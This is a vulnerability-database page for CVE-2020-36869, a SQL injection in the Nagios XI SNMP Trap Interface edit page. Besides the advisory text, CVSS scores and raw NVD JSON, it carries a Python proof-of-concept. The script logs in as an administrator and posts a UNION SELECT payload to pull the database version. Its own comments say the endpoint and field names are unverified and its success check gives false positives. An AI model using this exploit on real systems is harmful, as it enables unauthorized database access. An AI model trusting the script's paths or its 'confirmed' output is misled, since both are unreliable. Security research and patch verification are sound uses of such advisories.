Security Vulnerability Report
CVE-2020-36869 CVSS 7.2 HIGH

CVE-2020-36869

Published: 2025-10-30 22:15:40
Last Modified: 2025-11-05 18:23:08

Description

Nagios XI versions prior to 5.7.5 contain a SQL injection vulnerability in the SNMP Trap Interface edit page. Exploitation requires an account with administrative privileges to access the affected interface. A user with administrative access could supply crafted input that is not properly sanitized, allowing SQL injection that may lead to unauthorized disclosure or modification of application data or execution of arbitrary SQL commands against the backend database.

CVSS Details

CVSS Score
7.2
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:nagios:nagios_xi:*:*:*:*:*:*:*:* - VULNERABLE
Nagios XI < 5.7.5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
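# CVE-2020-36869 Nagios XI SQL Injection PoC
# Target: Nagios XI < 5.7.5
# Vulnerability: SQL Injection in SNMP Trap Interface Edit Page
#
# NOTE(review): the advisory text on this page names only the "SNMP Trap
# Interface edit page". The request path and the form field names used below
# are not stated there; treat them as unverified until checked against a
# vulnerable lab instance.
# Remediation: upgrade to Nagios XI 5.7.5 or later, the first release outside
# the affected range listed on this page (weakness class: CWE-89).
import requests
import sys
from urllib.parse import urlencode

# Disable SSL warnings
# Needed only because every request below uses verify=False; with certificate
# verification off, the administrator credentials posted in step 1 are sent
# without authenticating the server.
requests.packages.urllib3.disable_warnings()

# Placeholder values. The advisory states that exploitation requires an
# account with administrative privileges, so these must be an admin login.
TARGET_URL = "https://target-server/nagiosxi/"
USERNAME = "admin"
PASSWORD = "password"


def exploit_sqli(target_url, username, password):
    """
    SQL Injection PoC for CVE-2020-36869
    This demonstrates extracting database version information

    Args:
        target_url: Base URL of the Nagios XI web root; page names are
            appended to it directly, so it is expected to end with "/".
        username: Account name posted to the login form.
        password: Password posted to the login form.

    Returns:
        True only when the response to the injected request matched the
        version heuristic. False when login failed, a request raised, or the
        response was inconclusive.
    """
    session = requests.Session()

    # Step 1: Login to Nagios XI
    login_url = f"{target_url}login.php"
    login_data = {
        'username': username,
        'password': password,
        'loginButton': 'Login'
    }

    try:
        response = session.post(login_url, data=login_data, verify=False, timeout=30)
        # Login is judged only by the final URL after redirects: still being
        # on a URL containing "login" is treated as a rejected login.
        if 'login' not in response.url.lower():
            print("[+] Login successful!")
        else:
            print("[-] Login failed!")
            return False

        # Step 2: Navigate to SNMP Trap Interface Edit Page
        # The response body is not inspected; the request is kept because the
        # original script issues it before the POST.
        snmp_url = f"{target_url}includes/components/ccm/?cmd=modify&type=snmp_trap"
        response = session.get(snmp_url, verify=False, timeout=30)

        # Step 3: Inject malicious SQL payload
        # SQL Injection payload to extract database version
        inject_url = f"{target_url}includes/components/ccm/?cmd=modify&type=snmp_trap"

        # SQL Injection via trap var_name parameter
        sqli_payload = "' UNION SELECT NULL,@@version,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--"

        inject_data = {
            'trap_id': '1',
            'var_name': sqli_payload,
            'submit': 'Save'
        }

        response = session.post(inject_url, data=inject_data, verify=False, timeout=30)

        # NOTE(review): this check is prone to false positives. '5.' matches
        # any page that contains a decimal such as the product's own version
        # string, and 'MySQL'/'MariaDB' can appear in ordinary page text, so a
        # patched host can still print "Vulnerability confirmed". Confirm the
        # installed version against the 5.7.5 fix boundary instead of relying
        # on this output.
        if '5.' in response.text or 'MariaDB' in response.text or 'MySQL' in response.text:
            print("[+] SQL Injection successful! Database info leaked.")
            print("[+] Vulnerability confirmed for CVE-2020-36869")
            return True
        else:
            print("[*] SQL Injection payload sent, check manually for results")
            # Nothing was confirmed on this path, so do not report success.
            return False

    except requests.exceptions.RequestException as e:
        print(f"[-] Request error: {e}")
        return False


if __name__ == "__main__":
    print("="*60)
    print("CVE-2020-36869 Nagios XI SQL Injection PoC")
    print("="*60)

    # An optional first argument replaces the placeholder base URL; the
    # credentials always come from the module-level constants.
    if len(sys.argv) > 1:
        TARGET_URL = sys.argv[1]

    exploit_sqli(TARGET_URL, USERNAME, PASSWORD)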

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2020-36869", "sourceIdentifier": "[email protected]", "published": "2025-10-30T22:15:39.967", "lastModified": "2025-11-05T18:23:07.570", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Nagios XI versions prior to 5.7.5 contain a SQL injection vulnerability in the SNMP Trap Interface edit page. Exploitation requires an account with administrative privileges to access the affected interface. A user with administrative access could supply crafted input that is not properly sanitized, allowing SQL injection that may lead to unauthorized disclosure or modification of application data or execution of arbitrary SQL commands against the backend database."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", 
"modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:nagios:nagios_xi:*:*:*:*:*:*:*:*", "versionEndExcluding": "5.7.5", "matchCriteriaId": "475D740F-21D1-4901-BC99-0FD828109771"}]}]}], "references": [{"url": "https://www.nagios.com/changelog/nagios-xi/", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://www.vulncheck.com/advisories/nagios-xi-sqli-via-snmp-trap-interface-edit-page", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}